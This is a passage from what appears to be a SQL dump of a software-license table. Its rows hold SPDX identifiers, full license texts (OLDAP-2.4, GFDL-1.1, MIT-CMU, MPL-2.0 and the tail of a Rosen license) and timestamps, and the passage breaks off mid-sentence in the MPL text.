Nothing in this License\nshall be interpreted to prohibit Licensor from licensing under different terms\nfrom this License any Original Work that Licensor otherwise would have a right\nto license.\n\n 5) This section intentionally omitted.\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty of Provenance and Disclaimer of Warranty. Licensor warrants that\nthe copyright in and to the Original Work and the patent rights granted herein\nby Licensor are owned by the Licensor or are sublicensed to You under the\nterms of this License with the permission of the contributor(s) of those copyrights\nand patent rights. Except as expressly stated in the immediately proceeding\nsentence, the Original Work is provided under this License on an \"AS IS\" BASIS\nand WITHOUT WARRANTY, either express or implied, including, without limitation,\nthe warranties of NON-INFRINGEMENT, MERCHANTABILITY or FITNESS FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU.\nThis DISCLAIMER OF WARRANTY constitutes an essential part of this License.\nNo license to Original Work is granted hereunder except under this disclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to any person for any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor the use of the Original Work including, without limitation, damages for\nloss of goodwill, work stoppage, computer failure or malfunction, or any and\nall other commercial damages or losses. This limitation of liability shall\nnot apply to liability for death or personal injury resulting from Licensor\'s\nnegligence to the extent applicable law prohibits such limitation. Some jurisdictions\ndo not allow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n9) Acceptance and Termination. If You distribute copies of the Original Work\nor a Derivative Work, You must make a reasonable effort under the circumstances\nto obtain the express assent of recipients to the terms of this License. Nothing\nelse but this License (or another written agreement between Licensor and You)\ngrants You permission to create Derivative Works based upon the Original Work\nor to exercise any of the rights granted in Section 1 herein, and any attempt\nto do so except under the terms of this License (or another written agreement\nbetween Licensor and You) is expressly prohibited by U.S. copyright law, the\nequivalent laws of other countries, and by international treaty. Therefore,\nby exercising any of the rights granted to You in Section 1 herein, You indicate\nYour acceptance of this License and all of its terms and conditions.\n\n10) Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nas of the date You commence an action, including a cross-claim or counterclaim,\nfor patent infringement (i) against Licensor with respect to a patent applicable\nto software or (ii) against any entity with respect to a patent applicable\nto the Original Work (but excluding combinations of the Original Work with\nother software or hardware).\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of the U.S. Copyright Act, 17 U.S.C. ¤ 101 et seq.,\nthe equivalent laws of other countries, and international treaty. This section\nshall survive the termination of this License.\n\n12) Attorneys Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\nThis license is Copyright (C) 2003 Lawrence E. Rosen. All rights reserved.\n\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(27,'OLDAP-2.4','The OpenLDAP Public License\n\nVersion 2.4, 8 December 2000\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\n\n2. Redistributions in binary form must reproduce applicable copyright statements\nand notices, this list of conditions, and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution.\n\n 3. Redistributions must contain a verbatim copy of this document.\n\n4. The names and trademarks of the authors and copyright holders must not\nbe used in advertising or otherwise to promote the sale, use or other dealing\nin this Software without specific, written prior permission.\n\n 5. Due credit should be given to the OpenLDAP Project.\n\n6. The OpenLDAP Foundation may revise this license from time to time. Each\nrevision is distinguished by a version number. You may use the Software under\nterms of this license revision or under the terms of any subsequent revision\nof the license.\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nOpenLDAP is a trademark of the OpenLDAP Foundation.\n\nCopyright 1999-2000 The OpenLDAP Foundation, Redwood City, California, USA.\nAll Rights Reserved. Permission to copy and distributed verbatim copies of\nthis document is granted.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(28,'GFDL-1.1-only','GNU Free Documentation License\n\nVersion 1.1, March 2000\n\nCopyright (C) 2000 Free Software Foundation, Inc. 51 Franklin St, Fifth Floor,\nBoston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n 0. PREAMBLE\n\nThe purpose of this License is to make a manual, textbook, or other written\ndocument \"free\" in the sense of freedom: to assure everyone the effective\nfreedom to copy and redistribute it, with or without modifying it, either\ncommercially or noncommercially. Secondarily, this License preserves for the\nauthor and publisher a way to get credit for their work, while not being considered\nresponsible for modifications made by others.\n\nThis License is a kind of \"copyleft\", which means that derivative works of\nthe document must themselves be free in the same sense. It complements the\nGNU General Public License, which is a copyleft license designed for free\nsoftware.\n\nWe have designed this License in order to use it for manuals for free software,\nbecause free software needs free documentation: a free program should come\nwith manuals providing the same freedoms that the software does. But this\nLicense is not limited to software manuals; it can be used for any textual\nwork, regardless of subject matter or whether it is published as a printed\nbook. We recommend this License principally for works whose purpose is instruction\nor reference.\n\n 1. APPLICABILITY AND DEFINITIONS\n\nThis License applies to any manual or other work that contains a notice placed\nby the copyright holder saying it can be distributed under the terms of this\nLicense. The \"Document\", below, refers to any such manual or work. Any member\nof the public is a licensee, and is addressed as \"you\".\n\nA \"Modified Version\" of the Document means any work containing the Document\nor a portion of it, either copied verbatim, or with modifications and/or translated\ninto another language.\n\nA \"Secondary Section\" is a named appendix or a front-matter section of the\nDocument that deals exclusively with the relationship of the publishers or\nauthors of the Document to the Document\'s overall subject (or to related matters)\nand contains nothing that could fall directly within that overall subject.\n(For example, if the Document is in part a textbook of mathematics, a Secondary\nSection may not explain any mathematics.) The relationship could be a matter\nof historical connection with the subject or with related matters, or of legal,\ncommercial, philosophical, ethical or political position regarding them.\n\nThe \"Invariant Sections\" are certain Secondary Sections whose titles are designated,\nas being those of Invariant Sections, in the notice that says that the Document\nis released under this License.\n\nThe \"Cover Texts\" are certain short passages of text that are listed, as Front-Cover\nTexts or Back-Cover Texts, in the notice that says that the Document is released\nunder this License.\n\nA \"Transparent\" copy of the Document means a machine-readable copy, represented\nin a format whose specification is available to the general public, whose\ncontents can be viewed and edited directly and straightforwardly with generic\ntext editors or (for images composed of pixels) generic paint programs or\n(for drawings) some widely available drawing editor, and that is suitable\nfor input to text formatters or for automatic translation to a variety of\nformats suitable for input to text formatters. A copy made in an otherwise\nTransparent file format whose markup has been designed to thwart or discourage\nsubsequent modification by readers is not Transparent. A copy that is not\n\"Transparent\" is called \"Opaque\".\n\nExamples of suitable formats for Transparent copies include plain ASCII without\nmarkup, Texinfo input format, LaTeX input format, SGML or XML using a publicly\navailable DTD, and standard-conforming simple HTML designed for human modification.\nOpaque formats include PostScript, PDF, proprietary formats that can be read\nand edited only by proprietary word processors, SGML or XML for which the\nDTD and/or processing tools are not generally available, and the machine-generated\nHTML produced by some word processors for output purposes only.\n\nThe \"Title Page\" means, for a printed book, the title page itself, plus such\nfollowing pages as are needed to hold, legibly, the material this License\nrequires to appear in the title page. For works in formats which do not have\nany title page as such, \"Title Page\" means the text near the most prominent\nappearance of the work\'s title, preceding the beginning of the body of the\ntext.\n\n 2. VERBATIM COPYING\n\nYou may copy and distribute the Document in any medium, either commercially\nor noncommercially, provided that this License, the copyright notices, and\nthe license notice saying this License applies to the Document are reproduced\nin all copies, and that you add no other conditions whatsoever to those of\nthis License. You may not use technical measures to obstruct or control the\nreading or further copying of the copies you make or distribute. However,\nyou may accept compensation in exchange for copies. If you distribute a large\nenough number of copies you must also follow the conditions in section 3.\n\nYou may also lend copies, under the same conditions stated above, and you\nmay publicly display copies.\n\n 3. COPYING IN QUANTITY\n\nIf you publish printed copies of the Document numbering more than 100, and\nthe Document\'s license notice requires Cover Texts, you must enclose the copies\nin covers that carry, clearly and legibly, all these Cover Texts: Front-Cover\nTexts on the front cover, and Back-Cover Texts on the back cover. Both covers\nmust also clearly and legibly identify you as the publisher of these copies.\nThe front cover must present the full title with all words of the title equally\nprominent and visible. You may add other material on the covers in addition.\nCopying with changes limited to the covers, as long as they preserve the title\nof the Document and satisfy these conditions, can be treated as verbatim copying\nin other respects.\n\nIf the required texts for either cover are too voluminous to fit legibly,\nyou should put the first ones listed (as many as fit reasonably) on the actual\ncover, and continue the rest onto adjacent pages.\n\nIf you publish or distribute Opaque copies of the Document numbering more\nthan 100, you must either include a machine-readable Transparent copy along\nwith each Opaque copy, or state in or with each Opaque copy a publicly-accessible\ncomputer-network location containing a complete Transparent copy of the Document,\nfree of added material, which the general network-using public has access\nto download anonymously at no charge using public-standard network protocols.\nIf you use the latter option, you must take reasonably prudent steps, when\nyou begin distribution of Opaque copies in quantity, to ensure that this Transparent\ncopy will remain thus accessible at the stated location until at least one\nyear after the last time you distribute an Opaque copy (directly or through\nyour agents or retailers) of that edition to the public.\n\nIt is requested, but not required, that you contact the authors of the Document\nwell before redistributing any large number of copies, to give them a chance\nto provide you with an updated version of the Document.\n\n 4. MODIFICATIONS\n\nYou may copy and distribute a Modified Version of the Document under the conditions\nof sections 2 and 3 above, provided that you release the Modified Version\nunder precisely this License, with the Modified Version filling the role of\nthe Document, thus licensing distribution and modification of the Modified\nVersion to whoever possesses a copy of it. In addition, you must do these\nthings in the Modified Version:\n\nA. Use in the Title Page (and on the covers, if any) a title distinct from\nthat of the Document, and from those of previous versions (which should, if\nthere were any, be listed in the History section of the Document). You may\nuse the same title as a previous version if the original publisher of that\nversion gives permission.\n\nB. List on the Title Page, as authors, one or more persons or entities responsible\nfor authorship of the modifications in the Modified Version, together with\nat least five of the principal authors of the Document (all of its principal\nauthors, if it has less than five).\n\nC. State on the Title page the name of the publisher of the Modified Version,\nas the publisher.\n\n D. Preserve all the copyright notices of the Document.\n\nE. Add an appropriate copyright notice for your modifications adjacent to\nthe other copyright notices.\n\nF. Include, immediately after the copyright notices, a license notice giving\nthe public permission to use the Modified Version under the terms of this\nLicense, in the form shown in the Addendum below.\n\nG. Preserve in that license notice the full lists of Invariant Sections and\nrequired Cover Texts given in the Document\'s license notice.\n\n H. Include an unaltered copy of this License.\n\nI. Preserve the section entitled \"History\", and its title, and add to it an\nitem stating at least the title, year, new authors, and publisher of the Modified\nVersion as given on the Title Page. If there is no section entitled \"History\"\nin the Document, create one stating the title, year, authors, and publisher\nof the Document as given on its Title Page, then add an item describing the\nModified Version as stated in the previous sentence.\n\nJ. Preserve the network location, if any, given in the Document for public\naccess to a Transparent copy of the Document, and likewise the network locations\ngiven in the Document for previous versions it was based on. These may be\nplaced in the \"History\" section. You may omit a network location for a work\nthat was published at least four years before the Document itself, or if the\noriginal publisher of the version it refers to gives permission.\n\nK. In any section entitled \"Acknowledgements\" or \"Dedications\", preserve the\nsection\'s title, and preserve in the section all the substance and tone of\neach of the contributor acknowledgements and/or dedications given therein.\n\nL. Preserve all the Invariant Sections of the Document, unaltered in their\ntext and in their titles. Section numbers or the equivalent are not considered\npart of the section titles.\n\nM. Delete any section entitled \"Endorsements\". Such a section may not be included\nin the Modified Version.\n\nN. Do not retitle any existing section as \"Endorsements\" or to conflict in\ntitle with any Invariant Section.\n\nIf the Modified Version includes new front-matter sections or appendices that\nqualify as Secondary Sections and contain no material copied from the Document,\nyou may at your option designate some or all of these sections as invariant.\nTo do this, add their titles to the list of Invariant Sections in the Modified\nVersion\'s license notice. These titles must be distinct from any other section\ntitles.\n\nYou may add a section entitled \"Endorsements\", provided it contains nothing\nbut endorsements of your Modified Version by various parties--for example,\nstatements of peer review or that the text has been approved by an organization\nas the authoritative definition of a standard.\n\nYou may add a passage of up to five words as a Front-Cover Text, and a passage\nof up to 25 words as a Back-Cover Text, to the end of the list of Cover Texts\nin the Modified Version. Only one passage of Front-Cover Text and one of Back-Cover\nText may be added by (or through arrangements made by) any one entity. If\nthe Document already includes a cover text for the same cover, previously\nadded by you or by arrangement made by the same entity you are acting on behalf\nof, you may not add another; but you may replace the old one, on explicit\npermission from the previous publisher that added the old one.\n\nThe author(s) and publisher(s) of the Document do not by this License give\npermission to use their names for publicity for or to assert or imply endorsement\nof any Modified Version.\n\n 5. COMBINING DOCUMENTS\n\nYou may combine the Document with other documents released under this License,\nunder the terms defined in section 4 above for modified versions, provided\nthat you include in the combination all of the Invariant Sections of all of\nthe original documents, unmodified, and list them all as Invariant Sections\nof your combined work in its license notice.\n\nThe combined work need only contain one copy of this License, and multiple\nidentical Invariant Sections may be replaced with a single copy. If there\nare multiple Invariant Sections with the same name but different contents,\nmake the title of each such section unique by adding at the end of it, in\nparentheses, the name of the original author or publisher of that section\nif known, or else a unique number. Make the same adjustment to the section\ntitles in the list of Invariant Sections in the license notice of the combined\nwork.\n\nIn the combination, you must combine any sections entitled \"History\" in the\nvarious original documents, forming one section entitled \"History\"; likewise\ncombine any sections entitled \"Acknowledgements\", and any sections entitled\n\"Dedications\". You must delete all sections entitled \"Endorsements.\"\n\n 6. COLLECTIONS OF DOCUMENTS\n\nYou may make a collection consisting of the Document and other documents released\nunder this License, and replace the individual copies of this License in the\nvarious documents with a single copy that is included in the collection, provided\nthat you follow the rules of this License for verbatim copying of each of\nthe documents in all other respects.\n\nYou may extract a single document from such a collection, and distribute it\nindividually under this License, provided you insert a copy of this License\ninto the extracted document, and follow this License in all other respects\nregarding verbatim copying of that document.\n\n 7. AGGREGATION WITH INDEPENDENT WORKS\n\nA compilation of the Document or its derivatives with other separate and independent\ndocuments or works, in or on a volume of a storage or distribution medium,\ndoes not as a whole count as a Modified Version of the Document, provided\nno compilation copyright is claimed for the compilation. Such a compilation\nis called an \"aggregate\", and this License does not apply to the other self-contained\nworks thus compiled with the Document, on account of their being thus compiled,\nif they are not themselves derivative works of the Document.\n\nIf the Cover Text requirement of section 3 is applicable to these copies of\nthe Document, then if the Document is less than one quarter of the entire\naggregate, the Document\'s Cover Texts may be placed on covers that surround\nonly the Document within the aggregate. Otherwise they must appear on covers\naround the whole aggregate.\n\n 8. TRANSLATION\n\nTranslation is considered a kind of modification, so you may distribute translations\nof the Document under the terms of section 4. Replacing Invariant Sections\nwith translations requires special permission from their copyright holders,\nbut you may include translations of some or all Invariant Sections in addition\nto the original versions of these Invariant Sections. You may include a translation\nof this License provided that you also include the original English version\nof this License. In case of a disagreement between the translation and the\noriginal English version of this License, the original English version will\nprevail.\n\n 9. TERMINATION\n\nYou may not copy, modify, sublicense, or distribute the Document except as\nexpressly provided for under this License. Any other attempt to copy, modify,\nsublicense or distribute the Document is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies,\nor rights, from you under this License will not have their licenses terminated\nso long as such parties remain in full compliance.\n\n 10. FUTURE REVISIONS OF THIS LICENSE\n\nThe Free Software Foundation may publish new, revised versions of the GNU\nFree Documentation License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns. See http://www.gnu.org/copyleft/.\n\nEach version of the License is given a distinguishing version number. If the\nDocument specifies that a particular numbered version of this License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that specified version or of any later version that\nhas been published (not as a draft) by the Free Software Foundation. If the\nDocument does not specify a version number of this License, you may choose\nany version ever published (not as a draft) by the Free Software Foundation.\nADDENDUM: How to use this License for your documents\n\nTo use this License in a document you have written, include a copy of the\nLicense in the document and put the following copyright and license notices\njust after the title page:\n\nCopyright (c) YEAR YOUR NAME. Permission is granted to copy, distribute and/or\nmodify this document under the terms of the GNU Free Documentation License,\nVersion 1.1 or any later version published by the Free Software Foundation;\nwith the Invariant Sections being LIST THEIR TITLES, with the Front-Cover\nTexts being LIST, and with the Back-Cover Texts being LIST. A copy of the\nlicense is included in the section entitled \"GNU Free Documentation License\".\n\nIf you have no Invariant Sections, write \"with no Invariant Sections\" instead\nof saying which ones are invariant. If you have no Front-Cover Texts, write\n\"no Front-Cover Texts\" instead of \"Front-Cover Texts being LIST\"; likewise\nfor Back-Cover Texts.\n\nIf your document contains nontrivial examples of program code, we recommend\nreleasing these examples in parallel under your choice of free software license,\nsuch as the GNU General Public License, to permit their use in free software.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(29,'MIT-CMU','Copyright 1989, 1991, 1992 by Carnegie Mellon University\n\nDerivative Work - 1996, 1998-2000 Copyright 1996, 1998-2000 The Regents of\nthe University of California\n\nAll Rights Reserved\n\nPermission to use, copy, modify and distribute this software and its documentation\nfor any purpose and without fee is hereby granted, provided that the above\ncopyright notice appears in all copies and that both that copyright notice\nand this permission notice appear in supporting documentation, and that the\nname of CMU and The Regents of the University of California not be used in\nadvertising or publicity pertaining to distribution of the software without\nspecific written permission.\n\nCMU AND THE REGENTS OF THE UNIVERSITY OF CALIFORNIA DISCLAIM ALL WARRANTIES\nWITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS. IN NO EVENT SHALL CMU OR THE REGENTS OF THE UNIVERSITY OF CALIFORNIA\nBE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM THE LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\nACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR\nIN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(30,'MPL-2.0-no-copyleft-exception','Mozilla Public License Version 2.0\n\n 1. Definitions\n\n1.1. \"Contributor\" means each individual or legal entity that creates, contributes\nto the creation of, or owns Covered Software.\n\n1.2. \"Contributor Version\" means the combination of the Contributions of others\n(if any) used by a Contributor and that particular Contributor\'s Contribution.\n\n 1.3. \"Contribution\" means Covered Software of a particular Contributor.\n\n1.4. \"Covered Software\" means Source Code Form to which the initial Contributor\nhas attached the notice in Exhibit A, the Executable Form of such Source Code\nForm, and Modifications of such Source Code Form, in each case including portions\nthereof.\n\n 1.5. \"Incompatible With Secondary Licenses\" means\n\n(a) that the initial Contributor has attached the notice described in Exhibit\nB to the Covered Software; or\n\n(b) that the Covered Software was made available under the terms of version\n1.1 or earlier of the License, but not also under the terms of a Secondary\nLicense.\n\n1.6. \"Executable Form\" means any form of the work other than Source Code Form.\n\n1.7. \"Larger Work\" means a work that combines Covered Software with other\nmaterial, in a separate file or files, that is not Covered Software.\n\n 1.8. \"License\" means this document.\n\n1.9. \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently, any and all of the\nrights conveyed by this License.\n\n 1.10. \"Modifications\" means any of the following:\n\n(a) any file in Source Code Form that results from an addition to, deletion\nfrom, or modification of the contents of Covered Software; or\n\n(b) any new file in Source Code Form that contains any Covered Software.\n\n1.11. \"Patent Claims\" of a Contributor means any patent claim(s), including\nwithout limitation, method, process, and apparatus claims, in any patent Licensable\nby such Contributor that would be infringed, but for the grant of the License,\nby the making, using, selling, offering for sale, having made, import, or\ntransfer of either its Contributions or its Contributor Version.\n\n1.12. \"Secondary License\" means either the GNU General Public License, Version\n2.0, the GNU Lesser General Public License, Version 2.1, the GNU Affero General\nPublic License, Version 3.0, or any later versions of those licenses.\n\n1.13. \"Source Code Form\" means the form of the work preferred for making modifications.\n\n1.14. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" includes any entity that controls,\nis controlled by, or is under common control with You. For purposes of this\ndefinition, \"control\" means (a) the power, direct or indirect, to cause the\ndirection or management of such entity, whether by contract or otherwise,\nor (b) ownership of more than fifty percent (50%) of the outstanding shares\nor beneficial ownership of such entity.\n\n 2. License Grants and Conditions\n\n 2.1. Grants\n\nEach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby such Contributor to use, reproduce, make available, modify, display, perform,\ndistribute, and otherwise exploit its Contributions, either on an unmodified\nbasis, with Modifications, or as part of a Larger Work; and\n\n(b) under Patent Claims of such Contributor to make, use, sell, offer for\nsale, have made, import, and otherwise transfer either its Contributions or\nits Contributor Version.\n\n 2.2. Effective Date\n\nThe licenses granted in Section 2.1 with respect to any Contribution become\neffective for each Contribution on the date the Contributor first distributes\nsuch Contribution.\n\n 2.3. Limitations on Grant Scope\n\nThe licenses granted in this Section 2 are the only rights granted under this\nLicense. No additional rights or licenses will be implied from the distribution\nor licensing of Covered Software under this License. Notwithstanding Section\n2.1(b) above, no patent license is granted by a Contributor:\n\n(a) for any code that a Contributor has removed from Covered Software; or\n\n(b) for infringements caused by: (i) Your and any other third party\'s modifications\nof Covered Software, or (ii) the combination of its Contributions with other\nsoftware (except as part of its Contributor Version); or\n\n(c) under Patent Claims infringed by Covered Software in the absence of its\nContributions.\n\nThis License does not grant any rights in the trademarks, service marks, or\nlogos of any Contributor (except as may be necessary to comply with the notice\nrequirements in Section 3.4).\n\n 2.4. Subsequent Licenses\n\nNo Contributor makes additional grants as a result of Your choice to distribute\nthe Covered Software under a subsequent version of this License (see Section\n10.2) or under the terms of a Secondary License (if permitted under the terms\nof Section 3.3).\n\n 2.5. Representation\n\nEach Contributor represents that the Contributor believes its Contributions\nare its original creation(s) or it has sufficient rights to grant the rights\nto its Contributions conveyed by this License.\n\n 2.6. Fair Use\n\nThis License is not intended to limit any rights You have under applicable\ncopyright doctrines of fair use, fair dealing, or other equivalents.\n\n 2.7. Conditions\n\nSections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted in\nSection 2.1.\n\n 3. Responsibilities\n\n 3.1. Distribution of Source Form\n\nAll distribution of Covered Software in Source Code Form, including any Modifications\nthat You create or to which You contribute, must be under the terms of this\nLicense. You must inform recipients that the Source Code Form of the Covered\nSoftware is governed by the terms of this License, and how they can obtain\na copy of this License. You may not attempt to alter or restrict the recipients\'\nrights in the Source Code Form.\n\n 3.2. Distribution of Executable Form\n\n If You distribute Covered Software in Executable Form then:\n\n(a) such Covered Software must also be made available in Source Code Form,\nas described in Section 3.1, and You must inform recipients of the Executable\nForm how they can obtain a copy of such Source Code Form by reasonable means\nin a timely manner, at a charge no more than the cost of distribution to the\nrecipient; and\n\n(b) You may distribute such Executable Form under the terms of this License,\nor sublicense it under different terms, provided that the license for the\nExecutable Form does not attempt to limit or alter the recipients\' rights\nin the Source Code Form under this License.\n\n 3.3. Distribution of a Larger Work\n\nYou may create and distribute a Larger Work under terms of Your choice, provided\nthat You also comply with the requirements of this License for the Covered\nSoftware. If the Larger Work is a combination of Covered Software with a work\ngoverned by one or more Secondary Licenses, and the Covered Software is not\nIncompatible With Secondary Licenses, this License permits You to additionally\ndistribute such Covered Software under the terms of such Secondary License(s),\nso that the recipient of the Larger Work may, at their option, further distribute\nthe Covered Software under the terms of either this License or such Secondary\nLicense(s).\n\n 3.4. Notices\n\nYou may not remove or alter the substance of any license notices (including\ncopyright notices, patent notices, disclaimers of warranty, or limitations\nof liability) contained within the Source Code Form of the Covered Software,\nexcept that You may alter any license notices to the extent required to remedy\nknown factual inaccuracies.\n\n 3.5. Application of Additional Terms\n\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Covered Software. However,\nYou may do so only on Your own behalf, and not on behalf of any Contributor.\nYou must make it absolutely clear that any such warranty, support, indemnity,\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nevery Contributor for any liability incurred by such Contributor as a result\nof warranty, support, indemnity or liability terms You offer. You may include\nadditional disclaimers of warranty and limitations of liability specific to\nany jurisdiction.\n\n 4. Inability to Comply Due to Statute or Regulation\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Software due to statute, judicial\norder, or regulation then You must: (a) comply with the terms of this License\nto the maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be placed in a text file included with\nall distributions of the Covered Software under this License. Except to the\nextent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it.\n\n 5. Termination\n\n5.1. The rights granted under this License will terminate automatically if\nYou fail to comply with any of its terms. However, if You become compliant,\nthen the rights granted under this License from a particular Contributor are\nreinstated (a) provisionally, unless and until such Contributor explicitly\nand finally terminates Your grants, and (b) on an ongoing basis, if such Contributor\nfails to notify You of the non-compliance by some reasonable means prior to\n60 days after You have come back into compliance. Moreover, Your grants from\na particular Contributor are reinstated on an ongoing basis if such Contributor\nnotifies You of the non-compliance by some reasonable means, this is the first\ntime You have received notice of non-compliance with this License from such\nContributor, and You become compliant prior to 30 days after Your receipt\nof the notice.\n\n5.2. If You initiate litigation against any entity by asserting a patent infringement\nclaim (excluding declaratory judgment actions, counter-claims, and cross-claims)\nalleging that a Contributor Version directly or indirectly infringes any patent,\nthen the rights granted to You by any and all Contributors for the Covered\nSoftware under Section 2.1 of this License shall terminate.\n\n5.3. In the event of termination under Sections 5.1 or 5.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or Your distributors under this License prior\nto termination shall survive termination.\n\n 6. Disclaimer of Warranty\n\nCovered Software is provided under this License on an \"as is\" basis, without\nwarranty of any kind, either expressed, implied, or statutory, including,\nwithout limitation, warranties that the Covered Software is free of defects,\nmerchantable, fit for a particular purpose or non-infringing. The entire risk\nas to the quality and performance of the Covered Software is with You. Should\nany Covered Software prove defective in any respect, You (not any Contributor)\nassume the cost of any necessary servicing, repair, or correction. This disclaimer\nof warranty constitutes an essential part of this License. No use of any Covered\nSoftware is authorized under this License except under this disclaimer.\n\n 7. Limitation of Liability\n\nUnder no circumstances and under no legal theory, whether tort (including\nnegligence), contract, or otherwise, shall any Contributor, or anyone who\ndistributes Covered Software as permitted above, be liable to You for any\ndirect, indirect, special, incidental, or consequential damages of any character\nincluding, without limitation, damages for lost profits, loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all other commercial\ndamages or losses, even if such party shall have been informed of the possibility\nof such damages. This limitation of liability shall not apply to liability\nfor death or personal injury resulting from such party\'s negligence to the\nextent applicable law prohibits such limitation. Some jurisdictions do not\nallow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n 8. Litigation\n\nAny litigation relating to this License may be brought only in the courts\nof a jurisdiction where the defendant maintains its principal place of business\nand such litigation shall be governed by laws of that jurisdiction, without\nreference to its conflict-of-law provisions. Nothing in this Section shall\nprevent a party\'s ability to bring cross-claims or counter-claims.\n\n 9. Miscellaneous\n\nThis License represents the complete agreement concerning the subject matter\nhereof. If any provision of this License is held to be unenforceable, such\nprovision shall be reformed only to the extent necessary to make it enforceable.\nAny law or regulation which provides that the language of a contract shall\nbe construed against the drafter shall not be used to construe this License\nagainst a Contributor.\n\n 10. Versions of the License\n\n 10.1. New Versions\n\nMozilla Foundation is the license steward. Except as provided in Section 10.3,\nno one other than the license steward has the right to modify or publish new\nversions of this License. Each version will be given a distinguishing version\nnumber.\n\n 10.2. Effect of New Versions\n\nYou may distribute the Covered Software under the terms of the version of\nthe License under which You originally received the Covered Software, or under\nthe terms of any subsequent version published by the license steward.\n\n 10.3. Modified Versions\n\nIf you create software not governed by this License, and you want to create\na new license for such software, you may create and use a modified version\nof this License if you rename the license and remove any references to the\nname of the license steward (except to note that such modified license differs\nfrom this License).\n\n10.4. Distributing Source Code Form that is Incompatible With Secondary 